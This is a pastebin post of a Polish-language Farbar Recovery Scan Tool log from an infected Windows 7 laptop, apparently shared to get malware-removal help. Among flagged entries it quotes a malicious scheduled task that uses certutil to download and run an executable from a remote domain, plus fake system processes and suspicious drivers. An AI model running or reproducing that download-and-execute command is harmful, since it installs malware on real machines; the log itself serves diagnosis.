wklejto.pl

Dodane przez: ~Anonim (2021-09-04 21:32) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
248.
249.
250.
251.
252.
253.
254.
255.
256.
257.
258.
259.
260.
261.
262.
263.
264.
265.
266.
267.
268.
269.
270.
271.
272.
273.
274.
275.
276.
277.
278.
279.
280.
281.
282.
283.
284.
285.
286.
287.
288.
289.
290.
291.
292.
293.
294.
295.
296.
297.
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 01-09-2021
Uruchomiony przez Artur (administrator)  ARTUR-KOMPUTER (Dell Inc. Latitude D630) (04-09-2021 23:23:00)
Uruchomiony z C:\Users\Artur\Desktop
Załadowane profile: Artur
Platform: Windows 7 Ultimate Service Pack 1 (X64) Język: Polski (Polska)
Domyślna przeglądarka nie została wykryta!
Tryb startu: Normal
 
==================== Procesy (filtrowane) =================
 
(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)
 
() [Brak podpisu cyfrowego] C:\APP\ediag\eclipse.exe
() [Brak podpisu cyfrowego] C:\APP\sim\sim.exe
() [Brak podpisu cyfrowego] C:\Users\Artur\AppData\Local\Temp\csrss\nupload05053.exe
() [Brak podpisu cyfrowego] C:\Users\Artur\AppData\Roaming\Microsoft\Libs\sihost64.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apache Software Foundation) [Brak podpisu cyfrowego] C:\APP\ddc\opt\apache\bin\httpd_ddc.exe <2>
(DT Soft Ltd -> DT Soft Ltd) C:\Program Files (x86)\DAEMON Tools Pro\DTShellHlp.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <27>
(Hewlett-Packard Company -> HP) C:\Windows\System32\HPSIsvc.exe
(HP) [Brak podpisu cyfrowego] C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(International Business Machines Corporation) [Brak podpisu cyfrowego] C:\APP\ediag\importedj9\jre\bin\j9w.exe
(Odmowa dostępu) C:\Windows\windefender.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(PSA PEUGEOT CITROEN) [Brak podpisu cyfrowego] C:\APP\ddc\bin\psaAgent.exe
(SafeNet, Inc. -> SafeNet Inc.) C:\Windows\System32\hasplms.exe
(SafeNet, Inc. -> SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(SafeNet, Inc. -> SafeNet, Inc.) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe
(SafeNet, Inc.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
(The Firebird Project) [Brak podpisu cyfrowego] C:\AWRoot\bin\lib\firebird\bin\fbguard.exe
(The Firebird Project) [Brak podpisu cyfrowego] C:\AWRoot\bin\lib\firebird\bin\fbserver.exe
 
==================== Rejestr (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)
 
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-11-09] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [psastart] => C:\APP\ddc\bin\psaagent.exe [147456 2012-10-26] (PSA PEUGEOT CITROEN) [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [ediagStart] => C:\APP\ediag\eDiagStart.lnk [618 2020-05-28] () [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [SIM] => C:\APP\SIM\SIMBat.lnk [625 2020-05-28] () [Brak podpisu cyfrowego]
HKU\S-1-5-21-2083690716-618176776-2005264719-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35144320 2021-08-16] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2019-09-09] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Windows x64\Print Processors\HP1100PrintProc: C:\Windows\System32\spool\prtprocs\x64\HP1100PP.DLL [74240 2012-08-31] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\...\Print\Monitors\Advanced TCP/IP Port Monitor: C:\Windows\system32\mvtcpmon.dll [541184 2009-06-25] (Marvell Semiconductor, Inc.) [Brak podpisu cyfrowego]
HKLM\...\Print\Monitors\HP1100LM: C:\Windows\system32\HP1100LM.DLL [288768 2012-08-31] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe [2021-09-04] (Google LLC -> Google LLC)
 
==================== Zaplanowane zadania (filtrowane) ============
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
Task: {0CEDFE21-885B-42B7-9F3E-FA3297423775} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4651048 2021-09-04] (10124 -> ) [Brak podpisu cyfrowego] <==== UWAGA
Task: {1EF334CE-6499-41D5-B677-79E1704C4548} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.)
Task: {5138E38C-B8B2-4E6B-BCD5-7E2CE7A18366} - System32\Tasks\services64 => C:\Users\Artur\AppData\Roaming\services64.exe [44032 2021-09-04] (Google5 Inc.) [Brak podpisu cyfrowego] <==== UWAGA
Task: {5A95EFA7-79CA-481D-9BFE-B6B8D9F2DF8B} - System32\Tasks\{AC6143B3-CF11-40A5-A1A4-A35F16A880C3} => C:\Windows\system32\pcalua.exe -a D:\Driver_D_CAN_USB\OBDSetup.exe -d D:\Driver_D_CAN_USB
Task: {612713A5-0625-4FF7-8E88-B5884FFC8EE2} - System32\Tasks\CCleanerSkipUAC - Artur => C:\Program Files\CCleaner\CCleaner.exe [29211264 2021-08-16] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {6BE150D4-EAC7-4C0A-B27E-8A657D9E6142} - System32\Tasks\{85965F93-FBF2-4732-8E6F-3006B8F9C36A} => C:\Windows\system32\pcalua.exe -a C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB\OBDSetup.exe -d C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB
Task: {81D154D5-D5F8-4A76-BF12-28E79D5A9C1A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {89131FF6-BB15-4026-A749-7597C03BA23D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2019-11-02] (Google Inc -> Google Inc.)
Task: {897D4B3A-B756-4C1B-999D-B2D2C9AFCD78} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-08-16] (Piriform Software Ltd -> Piriform)
Task: {CC65F565-2B7C-4A58-9D3E-6D0DA05BB139} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [29211264 2021-08-16] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {F3D117F3-3D59-4350-9862-67E9944281F7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2019-11-02] (Google Inc -> Google Inc.)
 
(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)
 
 
==================== Internet (filtrowane) ====================
 
(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B740712C-7AF1-4D14-B39C-3ABA122B83AC}: [DhcpNameServer] 192.168.0.1
 
Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Artur\AppData\Local\Microsoft\Edge\User Data\Default [2021-09-04]
 
FireFox:
========
FF DefaultProfile: 6ba7w8zv.default
FF ProfilePath: C:\Users\Artur\AppData\Roaming\Mozilla\Firefox\Profiles\6ba7w8zv.default [2021-09-04]
FF ProfilePath: C:\Users\Artur\AppData\Roaming\Mozilla\Firefox\Profiles\5m5kgt92.default-release [2021-09-04]
FF ProfilePath: C:\Users\Artur\AppData\Roaming\Actia\diagnostic2.3.4.3\Profiles\ziyz3lpp.default [2020-05-28]
FF ProfilePath: C:\Users\Artur\AppData\Roaming\Actia\diagnostic2.3.30.0\Profiles\v6rispw6.default [2021-05-29]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (SmartPrintButton) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Przestarzałe] [Brak podpisu cyfrowego]
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @google.com/zxwebplugin -> C:\Windows\system32\npzxwebplugin.dll [Brak pliku]
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2019-09-23] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2019-09-23] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-07-24] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: lsjt.com/LsNetClientCtl -> C:\Program Files (x86)\HsWebPlugin\npLsNetClientCtl.dll [2019-11-12] (HEROSPEED TECHNOLOGY LIMITED -> ls)
 
Chrome: 
=======
CHR Profile: C:\Users\Artur\AppData\Local\Google\Chrome\User Data\Default [2021-09-04]
CHR Notifications: Default -> hxxps://www.facebook.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Artur\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-30]
 
==================== Usługi (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.)
S2 AppServiceb; C:\Windows\system32\LWPPKOYKN1.tmp [6144 2021-09-04] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
S3 EPMVssEaseusProvider; C:\Windows\system32\dllhost.exe /Processid:{FDAA7662-DB21-4227-9E67-878ECB09EA12} [9728 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 FirebirdGuardianDefaultInstance; C:\AWRoot\bin\lib\firebird\bin\fbguard.exe [65536 2008-07-03] (The Firebird Project) [Brak podpisu cyfrowego]
R3 FirebirdServerDefaultInstance; C:\AWRoot\bin\lib\firebird\bin\fbserver.exe [1527893 2008-07-03] (The Firebird Project) [Brak podpisu cyfrowego]
R2 hasplms; C:\Windows\system32\hasplms.exe [4621632 2015-04-14] (SafeNet, Inc. -> SafeNet Inc.)
R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [136704 2009-06-24] (HP) [Brak podpisu cyfrowego]
R2 HPSIService; C:\Windows\system32\HPSIsvc.exe [126880 2012-09-27] (Hewlett-Packard Company -> HP)
R2 SentinelKeysServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe [376832 2013-01-09] (SafeNet, Inc.) [Brak podpisu cyfrowego]
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [1259872 2013-01-09] (SafeNet, Inc. -> SafeNet, Inc)
R2 SentinelSecurityRuntime; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe [293216 2013-01-09] (SafeNet, Inc. -> SafeNet, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu) <==== UWAGA
S2 CDIF3Service; D:\CDIF3\bin\c3svc.exe [X]
 
===================== Sterowniki (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
R0 audas0; C:\Windows\System32\DRIVERS\audas0.sys [1191040 2019-11-10] (NGO -> nodongle.biz solutions)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2019-09-10] (DT Soft Ltd -> DT Soft Ltd)
S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [18528 2014-11-18] (CHENGDU YIWO Tech Development Co., Ltd. -> ) [Brak podpisu cyfrowego]
S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [10848 2014-11-18] (CHENGDU YIWO Tech Development Co., Ltd. -> ) [Brak podpisu cyfrowego]
R2 eusk2par; C:\Windows\system32\Drivers\eusk2par-amd64.sys [32336 2008-12-18] (Aladdin Knowledge Systems LTD  -> Aladdin Knowledge Systems Ltd.)
R2 hardlock; C:\Windows\system32\drivers\hardlock.sys [331608 2015-04-14] (SafeNet, Inc. -> SafeNet Inc.)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-09-26] (Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor, Inc.)
R2 Sentinel64; C:\Windows\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc. -> SafeNet, Inc.)
R3 SNTUSB64; C:\Windows\System32\DRIVERS\SNTUSB64.SYS [63568 2012-12-11] (SafeNet, Inc. -> SafeNet, Inc.)
R3 SrvHsfHDA; C:\Windows\System32\DRIVERS\VSTAZL6.SYS [292864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
R3 SrvHsfV92; C:\Windows\System32\DRIVERS\VSTDPV6.SYS [1485312 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
R3 SrvHsfWinac; C:\Windows\System32\DRIVERS\VSTCNXT6.SYS [740864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2021-09-04] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] <==== UWAGA
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
 
==================== Jeden miesiąc (utworzone) (filtrowane) =========
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2021-09-04 23:12 - 2021-09-04 23:12 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2021-09-04 23:09 - 2021-09-04 23:09 - 000003490 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2021-09-04 22:58 - 2021-09-04 23:00 - 000202576 _____ C:\TDSSKiller.3.1.0.28_04.09.2021_22.58.41_log.txt
2021-09-04 15:41 - 2021-09-04 15:41 - 000002210 _____ C:\Users\Public\Desktop\E-Sys Launcher PRO.lnk
2021-09-04 15:41 - 2021-09-04 15:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\E-Sys Launcher PRO
2021-09-04 14:33 - 2021-09-04 20:37 - 000000000 ____D C:\Data
2021-09-04 14:33 - 2021-09-04 14:33 - 000001632 _____ C:\Users\Artur\Desktop\E-Sys.lnk
2021-09-04 14:33 - 2021-09-04 14:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\E-Sys
2021-09-04 13:25 - 2021-09-04 13:27 - 000000000 ____D C:\Local Disk D_9420211325
2021-09-04 13:23 - 2021-09-04 13:25 - 000001143 ____H C:\Windows\EPMBatch.ept
2021-09-04 13:16 - 2021-09-04 13:16 - 000000000 _____ C:\Windows\BcdLog.txt
2021-09-04 13:10 - 2021-09-04 13:10 - 000001330 _____ C:\Users\Public\Desktop\EaseUS Partition Master 10.5.lnk
2021-09-04 13:10 - 2021-09-04 13:10 - 000000000 ____D C:\Users\Artur\Downloads\EASEUS Partition Master 10.5 (x86-x64) Full
2021-09-04 13:10 - 2021-09-04 13:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.5
2021-09-04 13:10 - 2015-04-16 11:26 - 003428488 _____ C:\Windows\system32\BootMan.exe
2021-09-04 13:10 - 2015-04-16 11:15 - 002536072 _____ C:\Windows\SysWOW64\BootMan.exe
2021-09-04 13:10 - 2014-11-18 14:46 - 000021088 _____ C:\Windows\SysWOW64\EuEpmGdi.dll
2021-09-04 13:10 - 2014-11-18 14:46 - 000017504 _____ C:\Windows\system32\EuEpmGdi.dll
2021-09-04 13:10 - 2014-11-18 14:39 - 000018528 _____ C:\Windows\system32\epmntdrv.sys
2021-09-04 13:10 - 2014-11-18 14:39 - 000015968 _____ C:\Windows\SysWOW64\epmntdrv.sys
2021-09-04 13:10 - 2014-11-18 14:39 - 000010848 _____ C:\Windows\system32\EuGdiDrv.sys
2021-09-04 13:10 - 2014-11-18 14:39 - 000010208 _____ C:\Windows\SysWOW64\EuGdiDrv.sys
2021-09-04 13:10 - 2014-11-18 14:38 - 000101984 _____ C:\Windows\system32\setupempdrvx64.exe
2021-09-04 13:10 - 2014-11-18 14:38 - 000088160 _____ C:\Windows\SysWOW64\setupempdrv03.exe
2021-09-04 12:47 - 2021-09-04 12:48 - 029508853 _____ C:\Users\Artur\Downloads\EASEUS Partition Master 10.5 (x86-x64) Full.rar
2021-09-04 12:27 - 2021-09-04 12:29 - 000045540 _____ C:\Users\Artur\Desktop\Addition.txt
2021-09-04 12:25 - 2021-09-04 23:24 - 000014624 _____ C:\Users\Artur\Desktop\FRST.txt
2021-09-04 12:25 - 2021-09-04 23:23 - 000000000 ____D C:\FRST
2021-09-04 12:25 - 2021-09-04 11:48 - 002302464 _____ (Farbar) C:\Users\Artur\Desktop\FRST64.exe
2021-09-04 12:15 - 2021-09-04 23:00 - 000000000 ____D C:\TDSSKiller_Quarantine
2021-09-04 12:07 - 2021-09-04 12:15 - 000204706 _____ C:\TDSSKiller.3.1.0.28_04.09.2021_12.07.26_log.txt
2021-09-04 12:07 - 2021-09-04 12:07 - 000000492 _____ C:\TDSSKiller.3.1.0.28_04.09.2021_12.07.16_log.txt
2021-09-04 12:07 - 2021-09-04 11:48 - 005054744 _____ (AO Kaspersky Lab) C:\Users\Artur\Desktop\tdsskiller.exe
2021-09-04 11:57 - 2021-09-04 11:45 - 008553680 _____ (Malwarebytes) C:\Users\Artur\Desktop\adwcleaner_8.3.0.exe
2021-09-04 11:56 - 2021-09-04 12:01 - 000000000 ____D C:\AdwCleaner
2021-09-04 10:54 - 2021-09-04 10:55 - 011697056 _____ (ESET) C:\Users\Artur\Downloads\esetonlinescanner (1).exe
2021-09-04 10:17 - 2021-09-04 23:07 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\LWPPKOYKN1.tmp
2021-09-04 10:14 - 2021-09-04 10:14 - 000083399 _____ C:\Users\Artur\AppData\LocalLow\CBh2vVnUK9g.zip
2021-09-04 10:14 - 2021-09-04 10:14 - 000000000 ____D C:\Users\Artur\AppData\LocalLow\aD1rF3aM8r
2021-09-04 10:06 - 2021-09-04 23:09 - 000003190 _____ C:\Windows\system32\Tasks\csrss
2021-09-04 10:06 - 2021-09-04 10:08 - 005552568 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2021-09-04 10:06 - 2021-09-04 10:08 - 000634312 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2021-09-04 10:05 - 2021-09-04 23:08 - 000003236 _____ C:\Windows\system32\Tasks\services64
2021-09-04 10:05 - 2021-09-04 10:55 - 000044032 _____ (Google5 Inc.) C:\Users\Artur\AppData\Roaming\services64.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 003223840 _____ (Realtek Semiconductor Corp.) C:\Users\Artur\AppData\Roaming\5495358.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 001564823 _____ C:\ProgramData\6476
2021-09-04 10:05 - 2021-09-04 10:05 - 000320000 _____ C:\Users\Artur\AppData\Roaming\8071467.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\8618314.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\7776951.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000226816 _____ C:\Users\Artur\AppData\Roaming\7717230.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000000000 ____D C:\Users\Artur\AppData\Roaming\Turfen
2021-09-04 10:05 - 2021-09-04 10:05 - 000000000 ____D C:\Users\Artur\AppData\Local\Yandex
2021-09-04 10:05 - 2021-09-04 10:05 - 000000000 ____D C:\ProgramData\64
2021-09-04 10:04 - 2021-09-04 10:05 - 000000000 ____D C:\ProgramData\4FLS8250KLISWEMBXZLTHMZ0H
2021-09-04 10:04 - 2021-09-04 10:04 - 000226816 _____ C:\Users\Artur\AppData\Roaming\7830778.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000166912 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\2266923.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000166400 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\1211288.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\5476827.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\4839901.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000000000 ___HD C:\Users\Artur\AppData\Roaming\WinHost
2021-09-04 10:03 - 2021-09-04 10:03 - 000000000 ____D C:\Users\Artur\Downloads\613328_EaseUS-Partitio
2021-09-04 10:02 - 2021-09-04 10:02 - 002200981 _____ C:\Users\Artur\Downloads\613328_EaseUS-Partitio.zip
2021-09-04 09:58 - 2021-09-04 13:16 - 000000028 _____ C:\Windows\OutLog.txt
2021-09-04 09:55 - 2021-09-04 09:55 - 000000000 ____D C:\ProgramData\SystemAcCrux
2021-09-04 09:55 - 2021-07-09 15:49 - 000076936 _____ (CHENGDU YIWO Tech Development Co., Ltd) C:\Windows\system32\Drivers\EUDCPEPM.sys
2021-09-04 09:55 - 2021-07-09 15:49 - 000024200 _____ (CHENGDU YIWO Tech Development Co., Ltd) C:\Windows\system32\Drivers\EUEDKEPM.sys
2021-09-04 09:54 - 2021-09-04 13:10 - 000000000 ____D C:\Program Files (x86)\EaseUS
2021-09-04 09:53 - 2021-09-04 09:54 - 047362344 _____ (EaseUS ) C:\Users\Artur\Downloads\epm_free_B12_easeus.exe
2021-09-04 09:52 - 2021-09-04 09:52 - 001485248 _____ C:\Users\Artur\Downloads\epm_free_Installer_20210904.11073.exe
2021-09-03 20:08 - 2021-09-03 20:10 - 000000000 ____D C:\Users\Artur\Esys
2021-09-03 19:39 - 2021-09-03 19:40 - 000000000 ____D C:\Users\Artur\Downloads\Archive-5d1a
2021-09-03 19:35 - 2021-09-03 19:36 - 1671129006 _____ C:\Users\Artur\Downloads\Archive-5d1a.zip
2021-09-03 18:50 - 2021-09-03 20:08 - 000000000 ____D C:\Users\Artur\AppData\Local\TokenMaster
2021-09-03 18:50 - 2021-09-03 18:50 - 000000000 ____D C:\Users\Artur\AppData\Roaming\TokenMaster
2021-09-03 18:45 - 2021-09-03 18:45 - 000000000 ____D C:\ProgramData\TokenMaster
2021-09-03 18:45 - 2021-09-03 18:45 - 000000000 ____D C:\Program Files (x86)\TokenMaster
2021-09-03 18:44 - 2021-09-03 18:44 - 000000000 ____D C:\Users\Artur\Desktop\jre
2021-09-03 18:30 - 2021-09-03 18:31 - 000000000 ____D C:\Users\Artur\Downloads\bimmerscene.com ESYS
2021-09-03 18:15 - 2021-09-03 18:27 - 497161548 _____ C:\Users\Artur\Downloads\bimmerscene.com ESYS.zip
2021-09-03 18:01 - 2021-09-03 18:01 - 006524615 _____ C:\Users\Artur\Downloads\Instrukcje.zip
2021-09-03 17:57 - 2021-09-03 17:57 - 000000000 ____D C:\Users\Artur\Downloads\E-SYS DLA ENET
2021-09-03 17:55 - 2021-09-03 17:55 - 000000541 _____ C:\Users\Artur\Downloads\E-SYS DLA ENET.zip
2021-09-01 21:43 - 2021-09-01 21:43 - 000262076 _____ C:\Users\Artur\Downloads\wniosek o wpis do ewidencji stowarzyszeń zwykłych.pdf
2021-09-01 21:15 - 2021-09-01 23:18 - 000000000 ____D C:\Users\Artur\Desktop\stowarzyszenie bocian
2021-08-22 09:54 - 2021-08-22 09:54 - 000002820 _____ C:\Windows\system32\Tasks\CCleanerSkipUAC - Artur
 
==================== Jeden miesiąc (zmodyfikowane) ==================
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2021-09-04 23:19 - 2009-07-14 06:45 - 000017296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-09-04 23:19 - 2009-07-14 06:45 - 000017296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-09-04 23:15 - 2009-07-14 19:55 - 004854082 _____ C:\Windows\system32\perfh015.dat
2021-09-04 23:15 - 2009-07-14 19:55 - 001593432 _____ C:\Windows\system32\perfc015.dat
2021-09-04 23:15 - 2009-07-14 07:13 - 000006456 _____ C:\Windows\system32\PerfStringBackup.INI
2021-09-04 23:14 - 2019-11-02 18:48 - 000000000 ____D C:\Program Files\CCleaner
